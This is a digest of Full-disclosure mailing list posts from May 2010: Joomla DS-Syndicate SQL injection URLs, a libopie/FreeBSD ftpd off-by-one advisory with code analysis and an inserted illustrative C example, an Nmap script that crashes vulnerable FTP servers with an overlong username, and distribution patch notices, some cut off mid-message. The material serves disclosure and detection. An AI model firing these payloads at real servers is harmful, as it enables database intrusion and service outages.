Re: [Full-disclosure] To the police who torment, harass and stalk me.

2010-05-27 Thread Michal
On 27/05/2010 02:23, ☣frank^2 wrote:
> On Wed, May 26, 2010 at 7:15 AM, n3pt...@london.com wrote:
>
>> I am a question to the world,
>> Not an answer to be heard.
>> All a moment that's held in your arms.
>> And what do you think you'd ever say?
>> I won't listen anyway…
>> You don't know me,
>> And I'll never be what you want me to be.
<snip>
>
> Pick up the pace!
> Enemy, show me what you wanna be.
> I can handle anything, even if I can't handle you.
> Readily, either way it better be.
> Don't you fucking pity me.
> Get up, get off.
> What the hell I'm saying i don't know about malevolent.
> Sure as hell decadent.
> I want someone to step up step off.
> Walls, let me fall, fuck you all.
> Get a grip, don't let me slip 'till i drop the ball.
>
<snip>

I'm a little teapot
Short and stout
Here is my handle
Here is my spout

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in DS-Syndicate for Joomla

2010-05-27 Thread MustLive
Hello Benji!

It's good that you are drawing attention to my advisories, but very often
your letters are unequal and not serious. So I've put you in my blacklist. I
have already written a recommendation to the list for people to use your time
wisely. And because you can't do it by yourself (as is clear), I'll help
you. I hope you'll now start using your time more wisely.

> so you've moved from discovering leet xss vulnerabilities

I'm discovering any vulnerabilities which I meet during my research. I
have no prejudice against any of the classes from WASC TC v1/v2. If you have
some problems with XSS or any other class of vulnerabilities, it's your own
problem (as I already mentioned to the list concerning moaning about XSS).

> to publishing old exploits?

I don't think it's old. While there are web sites with this vulnerability,
it won't be old; it's still current. I found these vulnerabilities in 2009 at
one web site (and after my announcement in 2010 I checked it on other web
sites), so at that time there were sites with these holes, and now there are
sites with them.

And in my second advisory about DS-Syndicate, which I published even
before you wrote me your letter, I wrote about new vulnerabilities which I
recently found in this plugin. So if you were looking for some fresh holes,
you could easily have found them.

> I would offer you a sec. job, but unfortunately I think you're too
> qualified.

Thanks for the offer :-). But I don't need offers from non-serious people
(including you).

Also note that from my side, I'd never offer you a security job, because I
need only serious employees. It's my main criterion for every kind of job,
including security jobs.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

- Original Message - 
From: Benji
To: MustLive
Cc: full-disclosure@lists.grok.org.uk
Sent: Sunday, May 23, 2010 1:55 PM
Subject: Re: [Full-disclosure] Vulnerabilities in DS-Syndicate for Joomla


oh cool, so you've moved from discovering leet xss vulnerabilities to
publishing old exploits?

I would offer you a sec. job, but unfortunately I think you're too
qualified.


On Sat, May 22, 2010 at 4:09 PM, MustLive mustl...@websecurity.com.ua
wrote:

Hello Full-Disclosure!

I want to warn you about security vulnerabilities in plugin DS-Syndicate for
Joomla.

-
Advisory: Vulnerabilities in DS-Syndicate for Joomla
-
URL: http://websecurity.com.ua/4003/
-
Affected products: all versions of DS-Syndicate for Joomla.
-
Timeline:

16.08.2009 - found vulnerabilities.
04.03.2010 - announced at my site. After making the announcement of these
vulnerabilities, I found that this SQLi vulnerability had already been found
in 2008 by boom3rang (before I found it in 2009), who disclosed an exploit for
it at milw0rm.com (http://www.milw0rm.com/exploits/6792). So boom3rang first
found the SQLi, and I first found the Full path disclosure in this plugin.
09.03.2010 - informed the developer (and at the developer's site I found that
he no longer supports this plugin, after his site on Joomla was hacked).
21.05.2010 - disclosed at my site.
-
Details:

These are SQL Injection and Full path disclosure vulnerabilities.

SQL Injection:

http://site/index2.php?option=ds-syndicate&version=1&feed_id=-1%20or%20version()=5

Full path disclosure:

http://site/index2.php?option=ds-syndicate&version=1&feed_id=

Note that the developer of the plugin doesn't support it anymore, so users of
the plugin need to fix it by themselves.

Just after disclosure of these vulnerabilities, I also found new
vulnerabilities in DS-Syndicate which I wrote about in separate advisory.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua



[Full-disclosure] libopie __readrec() off-by one (FreeBSD ftpd remote PoC)

2010-05-27 Thread Adam Zabrocki
[ libopie __readrec() off-by one (FreeBSD ftpd remote PoC) ]

Authors: 
- Maksymilian Arciemowicz
- Adam 'pi3' Zabrocki

http://securityreason.com/achievement_securityalert/87
http://site.pi3.com.pl/adv/libopie-adv.txt
http://blog.pi3.com.pl/?p=111


Date:
- Dis.: 04.05.2010
- Pub.: 27.05.2010

CVE: CVE-2010-1938
CWE: CWE-193

Affected Software:
- OPIE Authentication System ( libopie )

Software which uses libopie:
- OpenSuSE
- wu-ftpd
- mod_opie
- PAM
- openssh (modified by FreeBSD/DragonflyBSD Team)
- sudo
- opiesu
- popper
- Probably much more...

PoC:
- FreeBSD 8.0 ftpd(8) Remote Off-by one
  line FreeBSD 7 is not affected
  
Other software can be also affected. 


NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/84


--- 0. Description ---
OPIE is a freely redistributable kit that will drop into most *IX systems and
replaces your login and FTP daemon with versions that use OTP for user
authentication. It also includes an OTP generator and a library to make it
easy to add OTP authentication to existing clients and servers.


--- 1. OPIE Authentication System Off-by one ---
libopie allows REMOTE and LOCAL attackers to trigger an off-by-one overflow
(on the stack). Let's look at the code:

./src/contrib/opie/opie.h
/* Maximum length of a principal (read: user name) */
#define OPIE_PRINCIPAL_MAX 32

./src/contrib/opie/libopie/readrec.c
int __opiereadrec FUNCTION((opie), struct opie *opie)
{
  ...
  ...
  {
    char *c, principal[OPIE_PRINCIPAL_MAX];
    int i;

    if (c = strchr(opie->opie_principal, ':'))
      *c = 0;
[1] if (strlen(opie->opie_principal) > OPIE_PRINCIPAL_MAX)
[2]   (opie->opie_principal)[OPIE_PRINCIPAL_MAX] = 0;

[3] strcpy(principal, opie->opie_principal);
    ...
    ...
  }
  ...
  ...
ret:
  if (f)
    fclose(f);
  return rval;
}


At [1] this function checks the length of 'opie->opie_principal', which is
fully user-controlled. If the length is greater than OPIE_PRINCIPAL_MAX
(32 bytes), [2] writes a NUL byte at that position, so the string is at most
32 characters long.
The vulnerability is at [3]. strcpy() copies the user-controlled string, which
can be up to 32 characters long, into the local buffer 'principal', which is
also only 32 bytes long. This is an off-by-one bug: after copying 32 bytes,
strcpy() always appends the terminating NUL byte, which lands at
*(principal+32), one byte past the end of the buffer.
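The truncate-then-strcpy() sequence described above, reproduced in isolation as an added example. This is illustrative code written for this page, not libopie's or FreeBSD's source: only OPIE_PRINCIPAL_MAX, the cut at ':' and the three numbered steps mirror __opiereadrec() as quoted; the function names (run_copy(), vulnerable_readrec(), fixed_readrec(), probe()) and the guard byte are this example's own. The vulnerable copy keeps one guard byte after the 32-byte buffer so the 33rd byte that strcpy() writes can be observed instead of silently clobbering the stack frame; the corrected variant shows one way to close the hole, bounding the source to OPIE_PRINCIPAL_MAX - 1 characters before the copy so the terminator always fits.

```c
/* Added example, not libopie's code: the truncate-then-strcpy() pattern of
 * __opiereadrec() reproduced in isolation, next to a corrected variant.
 * Only OPIE_PRINCIPAL_MAX, the ':' cut and steps [1]-[3] mirror the
 * advisory; the function names and the guard byte are this example's own. */
#include <stdio.h>
#include <string.h>

#define OPIE_PRINCIPAL_MAX 32
#define GUARD ((char)0xAA)

/* `principal` is the 32-byte stack buffer from the advisory plus one guard
 * byte, so the NUL that strcpy() places at principal[32] is detectable
 * rather than corrupting whatever follows in the frame.
 * Returns 1 if the guard byte was overwritten, 0 otherwise. */
static int run_copy(const char *user, int fixed)
{
    char input[256];                         /* stands in for opie->opie_principal */
    char principal[OPIE_PRINCIPAL_MAX + 1];  /* 32 bytes + guard */
    char *c;

    strncpy(input, user, sizeof(input) - 1);
    input[sizeof(input) - 1] = '\0';
    memset(principal, 0, sizeof(principal));
    principal[OPIE_PRINCIPAL_MAX] = GUARD;

    if ((c = strchr(input, ':')) != NULL)    /* cut at ':' as libopie does */
        *c = '\0';

    if (!fixed) {
        /* Vulnerable: [1]/[2] leave up to 32 characters in `input`,
         * [3] then copies 32 characters plus a NUL = 33 bytes. */
        if (strlen(input) > OPIE_PRINCIPAL_MAX)      /* [1] */
            input[OPIE_PRINCIPAL_MAX] = '\0';        /* [2] */
    } else {
        /* Corrected: bound the source to 31 characters so the terminating
         * NUL written by strcpy() always fits inside the 32-byte buffer. */
        if (strlen(input) >= OPIE_PRINCIPAL_MAX)
            input[OPIE_PRINCIPAL_MAX - 1] = '\0';
    }

    strcpy(principal, input);                /* [3] */

    return principal[OPIE_PRINCIPAL_MAX] != GUARD;
}

int vulnerable_readrec(const char *user) { return run_copy(user, 0); }
int fixed_readrec(const char *user)      { return run_copy(user, 1); }

/* Build a username of `len` 'A's followed by ":junk" (the part libopie
 * discards at the ':') and run it through one of the two copies. */
int probe(size_t len, int fixed)
{
    char user[256];
    if (len > sizeof(user) - 6)
        len = sizeof(user) - 6;
    memset(user, 'A', len);
    strcpy(user + len, ":junk");
    return fixed ? fixed_readrec(user) : vulnerable_readrec(user);
}

int main(void)
{
    size_t lens[] = { 31, 32, 33, 200 };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("%3zu-char username: vulnerable=%s  fixed=%s\n", lens[i],
               probe(lens[i], 0) ? "OVERFLOW" : "ok",
               probe(lens[i], 1) ? "OVERFLOW" : "ok");
    return 0;
}
```

The boundary is exactly the one the advisory describes: 31 characters copy cleanly, 32 or more (with or without the ':' suffix) push the NUL one byte past the buffer, and the corrected bound keeps every length inside it.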
A possible way to reach this vulnerability:

./src/contrib/opie/libopie/lookup.c
int opielookup FUNCTION((opie, principal), struct opie *opie AND char *principal)
{
  int i;

  memset(opie, 0, sizeof(struct opie));
  opie->opie_principal = principal;

  if (i = __opiereadrec(opie))  <=== our call ;)
    return i;

  return (opie->opie_flags & __OPIE_FLAGS_RW) ? 0 : 2;
}


A deeper analysis of the code shows:

./src/contrib/opie/libopie/challenge.c
int opiechallenge FUNCTION((mp, name, ss), struct opie *mp AND char *name AND char *ss)
{
  int rval = -1;

  rval = opielookup(mp, name);

  ...
  ...

  return rval;
}

This function is really interesting because it is responsible for
authentication, so the vulnerability is reachable in the pre-auth phase. Many
programs use this function for authentication (for example the default FTP
daemon in FreeBSD) ;)

Another interesting call we can find here:

./src/contrib/opie/libopie/writerec.c
int __opiewriterec FUNCTION((opie), struct opie *opie)
{
  char buf[17], buf2[64];
  time_t now;
  FILE *f, *f2 = NULL;
  int i = 0;
  char *c;

  time(&now);
  if (strftime(buf2, sizeof(buf2), " %b %d,%Y %T", localtime(&now)) < 1)
    return -1;

  if (!(opie->opie_flags & __OPIE_FLAGS_READ)) {
    struct opie opie2;
    i = opielookup(&opie2, opie->opie_principal);  <=== our call :)
    ...
  }
  ...
  ...
}

and this function is used in many places:
./src/contrib/opie/libopie/passwd.c   <=== in function opiepasswd()
./src/contrib/opie/libopie/verify.c   <=== in function opieverify() - two times ;)

... so we have many entry points ;) But we are going to test the calls to
opiechallenge(): a pre-auth vulnerability sounds impressive ;) First let's
test the default FTP daemon of FreeBSD 8.0 ...


--- 2. FreeBSD 8.0 ftpd remote off-by one ---
The authentication code of the FTP server in FreeBSD 8 was modified: by
default it uses the OPIE library. Let's see:

http://www.freebsd.org/cgi/cvsweb.cgi/~checkout~/src/libexec/ftpd/ftpd.c?rev=1.214.2.1.2.1;content-type=text%2Fplain

...

if (opiechallenge(&opiedata, name, opieprompt) == 0) {
    pwok = (pw != NULL) &&
           opieaccessfile(remotehost) &&
           opiealways(pw->pw_dir);
    reply(331, "Response to %s %s for %s.",
          opieprompt, pwok ? "requested" : "required", name);
} else {
    pwok = 1;
    reply(331, "Password required for %s.", name);
}
askpasswd = 1;
...


this code has 

[Full-disclosure] [ MDVSA-2010:109 ] gtk+2.0

2010-05-27 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:109
 http://www.mandriva.com/security/
 ___

 Package : gtk+2.0
 Date: May 27, 2010
 Affected: 2008.0, 2009.0, 2009.1, Corporate 4.0, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability was discovered and fixed in gtk+2.0:
 
 gdk/gdkwindow.c in GTK+ before 2.18.5, as used in gnome-screensaver
 before 2.28.1, performs implicit paints on windows of type
 GDK_WINDOW_FOREIGN, which triggers an X error in certain circumstances
 and consequently allows physically proximate attackers to bypass
 screen locking and access an unattended workstation by pressing the
 Enter key many times (CVE-2010-0732).
 
 Packages for 2008.0 and 2009.0 are provided as of the Extended
 Maintenance Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 This update fixes this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0732
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 c3a29224a7ab7f869fad3541908f6eff  
2008.0/i586/gtk+2.0-2.12.1-2.2mdv2008.0.i586.rpm
 f3b1608da1dce0eb474b1f21bd77d75b  
2008.0/i586/libgdk_pixbuf2.0_0-2.12.1-2.2mdv2008.0.i586.rpm
 040a1ca71f7eadb280de43c92e49c17d  
2008.0/i586/libgdk_pixbuf2.0_0-devel-2.12.1-2.2mdv2008.0.i586.rpm
 57e8f954302b4c65ade25df18a6c95df  
2008.0/i586/libgtk+2.0_0-2.12.1-2.2mdv2008.0.i586.rpm
 49419f6f92d6b0ec484aced9de1bab2e  
2008.0/i586/libgtk+2.0_0-devel-2.12.1-2.2mdv2008.0.i586.rpm
 00b2ead1a22168be0125f115d8f0acb1  
2008.0/i586/libgtk+-x11-2.0_0-2.12.1-2.2mdv2008.0.i586.rpm 
 e6ad155061eed97be73cd9cc8a52a0d9  
2008.0/SRPMS/gtk+2.0-2.12.1-2.2mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 311dd4f3603ff9759e1136eeecaee89b  
2008.0/x86_64/gtk+2.0-2.12.1-2.2mdv2008.0.x86_64.rpm
 1af93ae5f0a506d4bd96d488335b4aa4  
2008.0/x86_64/lib64gdk_pixbuf2.0_0-2.12.1-2.2mdv2008.0.x86_64.rpm
 90ad7d83058d56e88961cbb4a4087b74  
2008.0/x86_64/lib64gdk_pixbuf2.0_0-devel-2.12.1-2.2mdv2008.0.x86_64.rpm
 67e8e76883260fff690d6b04ebb89cfc  
2008.0/x86_64/lib64gtk+2.0_0-2.12.1-2.2mdv2008.0.x86_64.rpm
 129c65e8a1b8ba370556de12547c9f5c  
2008.0/x86_64/lib64gtk+2.0_0-devel-2.12.1-2.2mdv2008.0.x86_64.rpm
 57e9f7712ed1f9eda1a1729c29049f8d  
2008.0/x86_64/lib64gtk+-x11-2.0_0-2.12.1-2.2mdv2008.0.x86_64.rpm 
 e6ad155061eed97be73cd9cc8a52a0d9  
2008.0/SRPMS/gtk+2.0-2.12.1-2.2mdv2008.0.src.rpm

 Mandriva Linux 2009.0:
 bcd63973ddb957847088f71b5cfc039b  
2009.0/i586/gtk+2.0-2.14.3-2.1mdv2009.0.i586.rpm
 9b46f9018c8fbb2d1e052e0cdd473ff4  
2009.0/i586/libgail18-2.14.3-2.1mdv2009.0.i586.rpm
 4d243b829780c8d2f35b4a5f08ac9acb  
2009.0/i586/libgail-devel-2.14.3-2.1mdv2009.0.i586.rpm
 a8ca74ec343faac9f4445cfc88b5accc  
2009.0/i586/libgdk_pixbuf2.0_0-2.14.3-2.1mdv2009.0.i586.rpm
 583607af6457480c4cb71af16f6f4563  
2009.0/i586/libgdk_pixbuf2.0_0-devel-2.14.3-2.1mdv2009.0.i586.rpm
 8b9b0c013bc5815e5803b3be4e681433  
2009.0/i586/libgtk+2.0_0-2.14.3-2.1mdv2009.0.i586.rpm
 10f6558dc95fe770c87e99f711c089fb  
2009.0/i586/libgtk+2.0_0-devel-2.14.3-2.1mdv2009.0.i586.rpm
 23eb8c8cfc87a4209b125b8909fb8a9b  
2009.0/i586/libgtk+-x11-2.0_0-2.14.3-2.1mdv2009.0.i586.rpm 
 d301fc61a2c8dc41a436edb699061955  
2009.0/SRPMS/gtk+2.0-2.14.3-2.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 6999641e621f9ee15bc439e0fe9b981f  
2009.0/x86_64/gtk+2.0-2.14.3-2.1mdv2009.0.x86_64.rpm
 33851500c872f253715d11fc1f0b908d  
2009.0/x86_64/lib64gail18-2.14.3-2.1mdv2009.0.x86_64.rpm
 47eaee7ac4576291e0974d7117a89459  
2009.0/x86_64/lib64gail-devel-2.14.3-2.1mdv2009.0.x86_64.rpm
 e2b68a8d746c9bb2bd515c93220ed73d  
2009.0/x86_64/lib64gdk_pixbuf2.0_0-2.14.3-2.1mdv2009.0.x86_64.rpm
 62060cfea7c077bebf712ddeea8960f1  
2009.0/x86_64/lib64gdk_pixbuf2.0_0-devel-2.14.3-2.1mdv2009.0.x86_64.rpm
 c191760f279fc7ef06bef3e37d3a5f82  
2009.0/x86_64/lib64gtk+2.0_0-2.14.3-2.1mdv2009.0.x86_64.rpm
 8c3cbfa56ca337b7e76ede7cdb6bf2dd  
2009.0/x86_64/lib64gtk+2.0_0-devel-2.14.3-2.1mdv2009.0.x86_64.rpm
 650995e6bec10b2d424b708e1be21d2f  
2009.0/x86_64/lib64gtk+-x11-2.0_0-2.14.3-2.1mdv2009.0.x86_64.rpm 
 d301fc61a2c8dc41a436edb699061955  
2009.0/SRPMS/gtk+2.0-2.14.3-2.1mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 f2396f78726e185da0c3bef4d762e8d0  
2009.1/i586/gtk+2.0-2.16.1-4.1mdv2009.1.i586.rpm
 07d45a8c633b79b3769035bcb0612a4b  
2009.1/i586/libgail18-2.16.1-4.1mdv2009.1.i586.rpm
 9110a10744b8f30bbcf67cd8c03eb4c7  
2009.1/i586/libgail-devel-2.16.1-4.1mdv2009.1.i586.rpm
 6f6edd01aec6960ddef6da316deb0e67  
2009.1/i586/libgdk_pixbuf2.0_0-2.16.1-4.1mdv2009.1.i586.rpm
 1e74c1e51677679f4d1f717253bac8f8  

Re: [Full-disclosure] To the police who torment, harass and stalk me.

2010-05-27 Thread sunjester
They might be at your door. I recommend walking to your window and peeking
outside every 120 seconds.

-- 
Freelance Web/Desktop Developer
http://fusecurity.com/ | Free Security Technology
http://www.rentacoder.com/

[Full-disclosure] [ MDVSA-2010:110 ] clamav

2010-05-27 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:110
 http://www.mandriva.com/security/
 ___

 Package : clamav
 Date: May 27, 2010
 Affected: 2008.0, 2009.0, Corporate 4.0, Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities were discovered and fixed in clamav:
 
 The cli_pdf function in libclamav/pdf.c in ClamAV before 0.96.1 allows
 remote attackers to cause a denial of service (crash) via a malformed
 PDF file, related to an inconsistency in the calculated stream length
 and the real stream length (CVE-2010-1639).
 
 Off-by-one error in the parseicon function in libclamav/pe_icons.c
 in ClamAV 0.96 allows remote attackers to cause a denial of service
 (crash) via a crafted PE icon that triggers an out-of-bounds read,
 related to improper rounding during scaling (CVE-2010-1640).
 
 Packages for 2008.0 and 2009.0 are provided as of the Extended
 Maintenance Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 This update provides clamav 0.96.1 which is not vulnerable to these
 issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1639
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1640
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 befa2aace21d5723723bb3a93444fff6  
2008.0/i586/clamav-0.96.1-0.1mdv2008.0.i586.rpm
 91de0b1b1d3717b02c5ec78f40b60068  
2008.0/i586/clamav-db-0.96.1-0.1mdv2008.0.i586.rpm
 5e63fa6565cbfaa4cc4000f77524a181  
2008.0/i586/clamav-milter-0.96.1-0.1mdv2008.0.i586.rpm
 58e46d78bf423fbb1ef84d6073fe1040  
2008.0/i586/clamd-0.96.1-0.1mdv2008.0.i586.rpm
 f24eadf9d0a1b0a7c733568207743385  
2008.0/i586/libclamav6-0.96.1-0.1mdv2008.0.i586.rpm
 3fee97d038854d35d18aee05054b6c0d  
2008.0/i586/libclamav-devel-0.96.1-0.1mdv2008.0.i586.rpm 
 ffbe6ca177a8b262e4c6fc0ca0f3669c  
2008.0/SRPMS/clamav-0.96.1-0.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 1082117001d058707bdfacc642498a2a  
2008.0/x86_64/clamav-0.96.1-0.1mdv2008.0.x86_64.rpm
 21bd752b8b431e61c089ccf428d01d29  
2008.0/x86_64/clamav-db-0.96.1-0.1mdv2008.0.x86_64.rpm
 2f83a0bb14fcefb8717f80964b173894  
2008.0/x86_64/clamav-milter-0.96.1-0.1mdv2008.0.x86_64.rpm
 a873d1c7e52e1c3d66b0515f83cb  
2008.0/x86_64/clamd-0.96.1-0.1mdv2008.0.x86_64.rpm
 7646d23e108a6e14f8d4092415ac02b9  
2008.0/x86_64/lib64clamav6-0.96.1-0.1mdv2008.0.x86_64.rpm
 658acc18cafe0edfa371ecbc014df8ae  
2008.0/x86_64/lib64clamav-devel-0.96.1-0.1mdv2008.0.x86_64.rpm 
 ffbe6ca177a8b262e4c6fc0ca0f3669c  
2008.0/SRPMS/clamav-0.96.1-0.1mdv2008.0.src.rpm

 Mandriva Linux 2009.0:
 a8d05f37aa91c68aae2085ff732c702b  
2009.0/i586/clamav-0.96.1-0.1mdv2009.0.i586.rpm
 5ec9f018d0041edb436550c89309171d  
2009.0/i586/clamav-db-0.96.1-0.1mdv2009.0.i586.rpm
 99628e6c2a48857b8826602c697b16ab  
2009.0/i586/clamav-milter-0.96.1-0.1mdv2009.0.i586.rpm
 0224610ee1b6329eff5c22d7f39578f0  
2009.0/i586/clamd-0.96.1-0.1mdv2009.0.i586.rpm
 fca0b7af4f6bb22071c75baab07a35b1  
2009.0/i586/libclamav6-0.96.1-0.1mdv2009.0.i586.rpm
 bdabf8cdc50a4c5685e6d260afe415b3  
2009.0/i586/libclamav-devel-0.96.1-0.1mdv2009.0.i586.rpm 
 d11af730b3a2c053ba1d6ec23fc564f0  
2009.0/SRPMS/clamav-0.96.1-0.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 60f63c024a8f817dadffa0d89e21eb9f  
2009.0/x86_64/clamav-0.96.1-0.1mdv2009.0.x86_64.rpm
 18f79b9b586bc80732dd10dbd2a6cc79  
2009.0/x86_64/clamav-db-0.96.1-0.1mdv2009.0.x86_64.rpm
 a581fe3f1c8361fabaf3cb9f376d59cb  
2009.0/x86_64/clamav-milter-0.96.1-0.1mdv2009.0.x86_64.rpm
 86a0d9f2a488e4da2fe6b53527b815e7  
2009.0/x86_64/clamd-0.96.1-0.1mdv2009.0.x86_64.rpm
 7e9bad2cfe4809f985d9d908af327b8d  
2009.0/x86_64/lib64clamav6-0.96.1-0.1mdv2009.0.x86_64.rpm
 d805cfe2b75d9a0fa2ffa0d31d7d27ec  
2009.0/x86_64/lib64clamav-devel-0.96.1-0.1mdv2009.0.x86_64.rpm 
 d11af730b3a2c053ba1d6ec23fc564f0  
2009.0/SRPMS/clamav-0.96.1-0.1mdv2009.0.src.rpm

 Corporate 4.0:
 1f908bfa4cbe1232569026efcf034b12  
corporate/4.0/i586/clamav-0.96.1-0.1.20060mlcs4.i586.rpm
 647ff93c4169583e606987983de6f938  
corporate/4.0/i586/clamav-db-0.96.1-0.1.20060mlcs4.i586.rpm
 a1bd815b64388a6a04fd14f423970c70  
corporate/4.0/i586/clamav-milter-0.96.1-0.1.20060mlcs4.i586.rpm
 fe0f9d33df3d9127161a8551dbb7e6c7  
corporate/4.0/i586/clamd-0.96.1-0.1.20060mlcs4.i586.rpm
 2faa8d0b9553999d5b18314ce63bf06b  
corporate/4.0/i586/libclamav6-0.96.1-0.1.20060mlcs4.i586.rpm
 e4728f4fa514d353279521d8ae782c0a  
corporate/4.0/i586/libclamav-devel-0.96.1-0.1.20060mlcs4.i586.rpm 
 517ac78ca08fe3ccd80ccd0e160c4f02  
corporate/4.0/SRPMS/clamav-0.96.1-0.1.20060mlcs4.src.rpm

 Corporate 

[Full-disclosure] ftp-libopie.nse in response to CVE-2010-1938

2010-05-27 Thread Henri Salo
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


A vulnerability that has been published today affects the OPIE
Authentication System (libopie).
According to the researchers it could hit many systems like

- OpenSuSE
- wu-ftpd
- mod_opie
- PAM
- openssh (modified by FreeBSD/DragonflyBSD Team)
- sudo
- opiesu
- popper
- Probably much more...

Original advisory:
http://securityreason.com/achievement_securityalert/87
See also:
http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc

Please find attached their PoC as a script for Nmap.
Example Output:
PORT   STATE SERVICE
21/tcp open  ftp
| ftp-libopie: Likely prone to CVE-2010-1938 (OPIE off-by-one stack overflow)
|_See http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc

A.G.


-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.12 (GNU/Linux)
Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org/

iEYEARECAAYFAkv+rS8ACgkQ3aDTTO0ha7j4igCffydmk9Y+U6ocVSNI5RwopoGh
vc0AniRSZZEkW5vgImS4czZsTTzS1bqf
=No6K
-END PGP SIGNATURE-

description = [[
Checks if an FTPd is prone to CVE-2010-1938 (OPIE off-by-one stack overflow).
Vulnerability discovered by Maksymilian Arciemowicz and Adam 'pi3' Zabrocki
]]

---
-- @output
-- PORT   STATE SERVICE
-- 21/tcp open  ftp
-- | ftp-libopie: Likely prone to CVE-2010-1938 (OPIE off-by-one stack overflow)
-- |_See http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc

author = "Ange Gutek"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"intrusive"}

require "shortport"

portrule = shortport.port_or_service(21, "ftp")

action = function(host, port)
  local socket = nmap.new_socket()
  local result
  -- If we use more than 31 chars for username, ftpd will crash (quoted from the
  -- advisory). 64 bytes is comfortably past that limit.
  local user_account = string.rep("A", 64)
  local status = true

  local err_catch = function()
    socket:close()
  end

  local try = nmap.new_try(err_catch)

  -- set_timeout() takes milliseconds; give the daemon time to answer
  socket:set_timeout(5000)
  try(socket:connect(host.ip, port.number, port.protocol))

  -- Consume the 220 banner first so that the next receive reads the reply to
  -- our USER command and not the greeting
  status, result = socket:receive_lines(1)
  if not status then
    socket:close()
    return
  end

  -- First, try a safe User so that we are sure that everything is ok
  local payload = "USER opie\r\n"
  try(socket:send(payload))

  status, result = socket:receive_lines(1)
  if status and not (string.match(result, "^421")) then

    -- Second, try the vulnerable user account
    payload = "USER " .. user_account .. "\r\n"
    try(socket:send(payload))

    status, result = socket:receive_lines(1)
    socket:close()
    if status then
      return
    else
      -- if the server does not answer anymore we may have reached a stack
      -- overflow condition
      return "Likely prone to CVE-2010-1938 (OPIE off-by-one stack overflow)\nSee http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc"
    end
  else
    socket:close()
    return
  end
end
___
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/

[Full-disclosure] [USN-945-1] ClamAV vulnerabilities

2010-05-27 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-945-1   May 27, 2010
clamav vulnerabilities
CVE-2010-1639, CVE-2010-2077
===

A security issue affects the following Ubuntu releases:

Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 9.04:
  libclamav6  0.95.3+dfsg-1ubuntu0.09.04.2

Ubuntu 9.10:
  libclamav6  0.95.3+dfsg-1ubuntu0.09.10.2

Ubuntu 10.04 LTS:
  libclamav6  0.96.1+dfsg-0ubuntu0.10.04.1

In general, a standard system update will make all the necessary
changes. For Ubuntu 10.04 LTS, this update uses a new upstream release,
which includes additional bug fixes.

Details follow:

It was discovered that ClamAV did not properly reallocate memory when
processing certain PDF files. A remote attacker could send a specially
crafted PDF and crash ClamAV. (CVE-2010-1639)

An out of bounds memory access flaw was discovered in ClamAV. A remote
attacker could send a specially crafted Portable Executable (PE) file
and crash ClamAV. This issue only affected Ubuntu 10.04 LTS.
(CVE-2010-2077)


Updated packages for Ubuntu 9.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.95.3+dfsg-1ubuntu0.09.04.2.diff.gz
  Size/MD5:   265661 7787b2b42609df529788c879e36d9fe8

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.95.3+dfsg-1ubuntu0.09.04.2.dsc
  Size/MD5: 1560 377a7d9c49cb15e1713f54b0a25778a2

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.95.3+dfsg.orig.tar.gz
  Size/MD5: 26892533 dfe1348c52223ab48f049123021aea4a

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-base_0.95.3+dfsg-1ubuntu0.09.04.2_all.deb
  Size/MD5: 24053336 60f643f76df7bf4db43f644bfc3ed5b4

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-docs_0.95.3+dfsg-1ubuntu0.09.04.2_all.deb
  Size/MD5:  1123516 f71ab8f9fba78f294ced9c926d0e7b04

http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-testfiles_0.95.3+dfsg-1ubuntu0.09.04.2_all.deb
  Size/MD5:   232182 9800f0104337931ae21666820cde

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-daemon_0.95.3+dfsg-1ubuntu0.09.04.2_amd64.deb
